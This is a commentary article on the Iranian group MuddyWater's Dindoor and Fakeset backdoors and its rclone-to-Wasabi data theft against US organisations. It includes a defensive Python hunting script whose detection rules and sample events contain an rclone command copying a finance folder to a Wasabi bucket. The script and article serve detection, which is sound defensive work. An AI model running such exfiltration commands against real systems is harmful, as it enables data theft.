Iranian MuddyWater Hackers Expose US Cybersecurity Gaps

If you're still convinced your bank or favorite airline is too big to fail—let alone to get hacked—you haven't been paying attention to the MuddyWater saga. The Iranian advanced persistent threat group, blamed for years of targeting Western interests, has now dropped two new backdoors on U.S. organizations: Dindoor and Fakeset. The FBI surely cares, but the real question is why this keeps happening, again and again, with the same miserable results.

The New Malware in Town: Dindoor and Fakeset

Let's get specific. MuddyWater (or Seedworm, if you prefer your threats with cutesy code names) just escalated its campaign with Dindoor and Fakeset. Dindoor runs on the Deno runtime for JavaScript and TypeScript—yes, that's the hip new runtime you probably haven't patched in six months. Fakeset, meanwhile, is a Python-based backdoor. Both come signed with digital certificates allegedly issued to "Amy Cherne" and "Donald Gay," names that cropped up in earlier MuddyWater campaigns like some sort of malware family tree nobody asked for.

These aren't your off-the-shelf infostealers. They're specialized, tailored, and designed to do one thing: crack open U.S. infrastructure and exfiltrate whatever data you thought was safe behind all those expensive firewalls and compliance checklists. Dindoor and Fakeset have already burrowed into networks that matter—financial institutions, defense and aerospace suppliers, even NGOs—because phishing emails and old web app exploits remain the infection vectors of choice, and many organizations still refuse to close them.

Who’s Being Targeted and Why?

If it feels like sector after sector in the U.S. is always getting breached, it's not your imagination. MuddyWater’s recent victims include a U.S. bank, an airport, a defense contractor with ties to Israel, and several North American NGOs. None of them saw this coming, which is both sad and unsurprising.

This latest campaign follows joint U.S.-Israeli airstrikes on Iran in February. In other words, it's not hard to figure out the motive: retaliation, espionage, and yet another not-so-cold phase in the ongoing cyber cold war. Is this a rare event? Hardly. MuddyWater and its overlords at Iran's Ministry of Intelligence and Security have staged operations like this since at least 2018. Your data is just the current collateral damage.

Stealing Data: Rclone and the Cloud

Researchers spotted something familiar and dreadfully efficient in this attack—an attempt to siphon data using Rclone, a legitimate open-source cloud sync tool that attackers routinely repurpose to copy files out of a victim's network, in this case straight to a Wasabi cloud storage bucket. Did it work? Nobody's sure yet, but that's not actually the point. The point is that a well-resourced APT group used standard, freely available tools to move high-value data, undetected, through cloud channels everyone supposedly "monitors." If you're a security vendor, now's the time to pretend this is new. If you're actually in charge of security, good luck explaining why you missed it.
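Two of the observables the article names are cheap to hunt for in endpoint telemetry: executables signed with certificates issued to "Amy Cherne" or "Donald Gay", and Rclone being used to push data to Wasabi. The script below is an added example, not code from the article or from any vendor it mentions. It runs a simple detection over newline-delimited JSON process-creation events; the event schema (`host`, `pid`, `signer`, `cmdline`) and the sample events are constructed for illustration, and the assumption that Wasabi S3 endpoints live under the `wasabisys.com` domain is mine, not the article's.

```python
"""Hunt for two MuddyWater-style observables in process-creation telemetry:
(1) binaries whose code-signing subject is one of the signer names reported for
    Dindoor/Fakeset, and
(2) rclone invocations that copy/sync/move data to a remote, with an extra flag
    when the S3 endpoint given on the command line is a Wasabi host.
The JSON event format, the Wasabi domain pattern and the sample events below are
constructed assumptions for this example, not telemetry from the article."""
import json
import re
import shlex

# Certificate subject names reported for the Dindoor/Fakeset samples (from the article).
SUSPECT_SIGNERS = {"amy cherne", "donald gay"}

# Assumption: Wasabi S3 endpoints sit under wasabisys.com (e.g. s3.wasabisys.com).
WASABI_HOST = re.compile(r"(^|\.)wasabisys\.com$", re.IGNORECASE)

# rclone sub-commands that move data out of the host, plus others we recognise
# so the verb can be found regardless of where global flags are placed.
RCLONE_EXFIL_VERBS = {"copy", "sync", "move", "copyto", "moveto", "rcat"}
RCLONE_VERBS = RCLONE_EXFIL_VERBS | {"ls", "lsd", "lsl", "lsf", "config", "version", "mount", "check", "size"}


def _is_rclone(argv):
    """True if the executable token is rclone (any path, Windows or POSIX)."""
    if not argv:
        return False
    exe = argv[0].replace("\\", "/").split("/")[-1].lower()
    return exe in ("rclone", "rclone.exe")


def _is_remote_path(tok):
    """rclone remotes look like 'name:path' (or ':backend:path'); exclude Windows drive letters."""
    m = re.match(r"^([A-Za-z0-9_.-]*):(.*)$", tok)
    if not m:
        return False
    name, rest = m.group(1), m.group(2)
    if len(name) == 1 and (rest == "" or rest[0] in "\\/"):
        return False  # 'D:\Finance' or 'C:/x' is a local drive, not a remote
    return True


def _wasabi_endpoint(argv):
    """Return the Wasabi host if --s3-endpoint points at one, else None.
    A remote configured in rclone.conf carries no endpoint on the command line,
    so None is not proof that the destination is not Wasabi."""
    for i, tok in enumerate(argv):
        if tok.startswith("--s3-endpoint"):
            host = tok.split("=", 1)[1] if "=" in tok else (argv[i + 1] if i + 1 < len(argv) else "")
            host = re.sub(r"^https?://", "", host).split("/")[0]
            if WASABI_HOST.search(host):
                return host
    return None


def classify_event(event):
    """Return a list of finding strings for one process-creation event (empty if nothing matched)."""
    findings = []
    signer = (event.get("signer") or "").strip().lower()
    if signer in SUSPECT_SIGNERS:
        findings.append(f"binary signed by suspect certificate subject '{event['signer']}'")

    cmdline = event.get("cmdline") or ""
    try:
        # posix=False keeps backslashes in Windows paths intact.
        argv = shlex.split(cmdline, posix=False)
    except ValueError:  # unbalanced quotes; fall back to naive whitespace split
        argv = cmdline.split()

    if _is_rclone(argv):
        verb = next((t.lower() for t in argv[1:] if t.lower() in RCLONE_VERBS), None)
        if verb in RCLONE_EXFIL_VERBS and any(_is_remote_path(t) for t in argv[1:]):
            host = _wasabi_endpoint(argv)
            if host:
                findings.append(f"rclone '{verb}' to Wasabi endpoint {host}")
            else:
                findings.append(f"rclone '{verb}' to a remote (endpoint not on command line)")
    return findings


def scan(log_lines):
    """Parse NDJSON events and return (host, pid, findings) for each event with findings."""
    hits = []
    for line in log_lines:
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed lines rather than aborting the sweep
        findings = classify_event(ev)
        if findings:
            hits.append((ev.get("host"), ev.get("pid"), findings))
    return hits


# Constructed sample events (not real telemetry). JSON needs '\\' for one backslash.
SAMPLE_LOG = r"""
{"host":"fs01","pid":4112,"signer":"Microsoft Windows","cmdline":"C:\\Windows\\System32\\svchost.exe -k netsvcs"}
{"host":"fs01","pid":5520,"signer":"Amy Cherne","cmdline":"C:\\Users\\Public\\update.exe --quiet"}
{"host":"ws17","pid":9031,"signer":"","cmdline":"C:\\Temp\\rclone.exe copy D:\\Finance remote:backup --s3-endpoint s3.wasabisys.com --transfers 32"}
{"host":"ws17","pid":9044,"signer":"","cmdline":"rclone ls remote:backup"}
{"host":"ws22","pid":1200,"signer":"","cmdline":"rclone sync /srv/data remote:share"}
this line is not JSON
"""

if __name__ == "__main__":
    for host, pid, findings in scan(SAMPLE_LOG.splitlines()):
        print(f"{host} pid={pid}: " + "; ".join(findings))
```

On the sample data this flags the "Amy Cherne"-signed binary, the `rclone copy` to `s3.wasabisys.com`, and the `rclone sync` to a remote whose endpoint is hidden in a config file; a plain `rclone ls` and a local-to-local sync are ignored. In production you would feed it your EDR's process events and treat the "endpoint not on command line" case as a prompt to inspect the host's rclone.conf.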

Initial Access: The Same Old Tricks Still Work

Despite all the money thrown at cybersecurity, phishing emails and unpatched apps are still the winning ticket for attackers. MuddyWater isn't about zero-day wizardry or intricate supply chain attacks every week. Most breaches still come down to someone clicking the wrong link—or a critical web application that hasn't seen a patch since the last round of "urgent" security meetings.

The real problem? Organizations refuse to fix the basics. Phishing training is reduced to drab online modules nobody remembers. Patching gets deferred because of "critical business processes." Never mind that these excuses leave the barn door wide open for the likes of MuddyWater to stroll in, drop some Dindoor, and leave with whatever data they want.

The Historical Context That Should Scare You

MuddyWater isn't just another crew of script kiddies. This is a persistent, state-backed threat operation run by Iran's MOIS, and they've been honing their tactics for nearly a decade. Previous targets span government agencies, telecoms, and real critical infrastructure—the kind you mostly hear about during Congressional hearings, after the fact. Every few months, the tools get a bit better, the attacks more focused, and the West is still on the losing side of this asymmetrical cyber fight. The Dindoor and Fakeset episode is just the latest offensive in a campaign that’s not slowing down.

What Are We Doing Wrong?

You'd think, after years of being hit with these threats, organizations would have learned something. You'd be wrong. MuddyWater, like many APTs, thrives on systemic complacency and perpetual underinvestment in real defensive measures.

  • Advanced phishing detection? Still missing in too many environments, or implemented as a tick-box exercise.
  • Patching urgent vulnerabilities? Only when regulators threaten fines, and even then, expect delays.
  • Outbound traffic monitoring? Sure, until budgets get cut or complexity gets too high.
  • Multi-factor authentication? Implemented on some critical accounts. For everyone else, maybe next year.
  • Regular security audits? If they happen, they’re rarely thorough, and findings end up in the bottom drawer.

The cybersecurity echo chamber is full of advice, but let's be honest: most of it goes nowhere. That means attackers don't have to break a sweat. They just keep doing what works, because it works.

So, What Now?

The threat from MuddyWater doesn't look like it’ll fade. The U.S. and its allies have shown little appetite for actual deterrence in the digital domain. As for organizations in banking, defense, and critical infrastructure, it’s long past time to do more than buy the latest security appliance or nod sagely at industry guidelines. Patch your apps. Train your users like you mean it. Monitor everything. Set up multi-factor authentication everywhere, not just where it’s easy.

MuddyWater’s ongoing campaign is a wake-up call, but let's not kid ourselves—most will hit snooze. So if you wake up to your own data in a Wasabi bucket halfway across the world, don’t say you weren’t warned.
